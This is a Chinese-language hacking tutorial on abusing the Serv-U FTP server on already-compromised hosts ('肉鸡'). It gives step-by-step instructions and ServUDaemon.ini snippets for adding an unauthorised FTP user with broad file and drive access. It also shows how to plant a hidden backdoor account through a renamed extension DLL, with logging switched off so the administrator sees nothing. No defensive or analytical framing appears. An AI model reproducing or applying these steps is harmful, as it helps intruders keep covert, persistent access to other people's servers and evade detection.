如何利用肉鸡上的Serv-U Ftp服务器

samsungsamsung

　　之一:添加一个用户
　　很多肉鸡安装了serv-U服务器，我们可以把它利用起来，下面的方法是可以通过telnet或者nc命令行直接修改serv-U的参数而利用之。
　　在serv-U的目录下有一个servudaemon.ini，关键是修改servudaemon.ini，第一步，当然是要先把对方的servudaemon.ini下载回来，在本机把它修改好。至于怎么把这个文件取回来不是这里讨论的问题，方法很多。
　　下面请看一个servdaemon.ini的范例，中是我写的说明文字，不是文件中的文字。
　　[GLOBAL]
Version=4.0.0.4
RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAawEEBLH71T7nA+cDAgAIUm9nZXJMZWUSbGls
　　aW5nanVuQHNpbmEuY29tB0VDTGlQU0UA
ProcessID=1748
[DOMAINS]
Domain1=0.0.0.0||21|Wizard Generated Domain|1|0
[Domain1]
User1=Anonymous|1|0
User2=1|1|0
User3=2|1|0
[USER=Anonymous|1]
HomeDir=d:\wutemp
RelPaths=1
TimeOut=600
Note1="Wizard generated account"
Access1=D:\WUTemp|RLP
[USER=2|1]
Password=cuA40FB53D1C89D1E7153EF826B6B38DC3
HomeDir=D:\temp
RelPaths=1
TimeOut=600
Access1=D:\temp|RLP
[USER=1|1]
Password=hv12154DF65AC601DDA5D39C2F7B2E0F4C
HomeDir=d:\temp
RelPaths=1
TimeOut=600
Access1=D:\temp|RWLP
　　权限设定具体说明：
RL 只能读文件，下载文件
RWL 可以写文件，所以可以上载文件
RWML M是可以删除的权限
RWAMEL A是添加权限，E是执行权限
RWLCD C是目录创建权限，D是目录删除权限
　　OK，所以首先是把对方的servudaemon.ini下载到本地的机器上，根据自己的需要把这个文件修改好，然后再传上去覆盖原文件。
　　修改的步骤是在[DOMAIN1]中先添加用户名称，如上例中已经有三个用户anonymous、1、2，再添加一个用户3，密码为空，在d:\temp目录下可以读写文件、创建删除目录，不锁定在本目录，同时对C:\有访问权限。
　　先在[Domain1]下增加一个用户，如下：
user4=3|1|0
　　然后再增加一个段，说明用户"3"的权限
[user3|1]
HomeDir=d:\temp
TimeOut=600
Access1=D:\temp|RWLCDP
Access2=C:\|RLP
　　之二:添加一个隐蔽的帐号
在 Serv-U 中建立隐藏用户(本地通过，未经肉鸡测试~~希望大家完善本文)
　　在如今的 FTP 服务段软件中，Serv-U 以其简单易用性成为广大管理员的首选，当我
们控制一台肉鸡后，如果它采用 Serv-U 管理 FTP ，我们该如何建立一个隐藏的 FTP 账
户来下载他的东东呢？
　　我们可以采用 Serv-U Assistant 这个软件，可以到作者网页 http://www.katkat.com/ 或
者在华军下载（目前版本为1.01）
　　这个软件主要用于扩充 Serv-U 的帐号管理, 它采用Serv-U扩展库，实现的原理为"帐
号-映射"，建立一个或多个帐号"映射"，当在 Serv-U 中设置好一个固定帐号（即Serv-U
的帐号）后，"映射帐号"就继承了这个固定帐号的所有权限设置，每个"映射帐号" 有各
自的登录密码。
　　下载压缩文件 AssServU.zip，解压后得到以下文件：
AssServU.dll -------- 扩充功能库
AssServU.exe -------- 管理主程序
AssServU.ini -------- 配置文件
AssServU.mdb -------- 数据库文件
AssReadme.mht ------- 自述文件
　　我们的目的是为了隐藏我们 FTP 账号，因此第一步我们要获取肉鸡上的一个 Serv-U
的账户名（仅账户名而已）：3389图形界面可以通过 ServUAdmin.exe 获得；命令行下可以
通过 ServUDaemon.ini 获得，当然最好获得权限比较大的用户名（因为我们的隐藏账号的
权限与他的相同）
　　第二步：在自己的机器上做好配置：首先为了隐藏的需要，我们将assServU.mdb复制
一份为ServU.dat ，将assServU.dll改名为ServU.dll ；
双击 assServU.exe ，在 Settting 选项卡下的 Log options 中去掉 Log system
messages 、 Log error messages 、 Log file dosnloads 、 Log file uploads 前面的勾（这是
为了系统不记录日志）；在 Account Datasource 中选 Custom ，在 Connection string 点
Set ，在"连接"选项卡中的"1。选择或输入数据库名称"中将 AssServU.mdb 改为
Servu.dat ，然后点"确定"，在退回 Setting 选项卡后点 Save 。
在 Account 选项卡下添加用户， Username 为你想添加的用户，如：hacker， Password
为你的密码，如：123， Serv-U account 为第一步中你选择的权限较大的用户，如：admin，
然后点 Save 按钮。
　　好了，配置完成。
　　第三步：上传我们的 ServU.dat 和 ServU.dll ，修改肉鸡的 ServUDaemon.ini 文件，添加
以下字段：
[EXTERNAL]
ClientCheckDLL1=ServU.dll
然后重起Serv-U 服务
　　这样你就可以用隐藏账号登陆了，此时登陆账号还是第一步你选择的账号，但密码格式
为"你的用户名=密码"，如果你像第二步那样设置的话，登陆名就为admin,密码为hacker=111
　　hehe,这样管理员在管理界面什么都看不出来
OK,game over!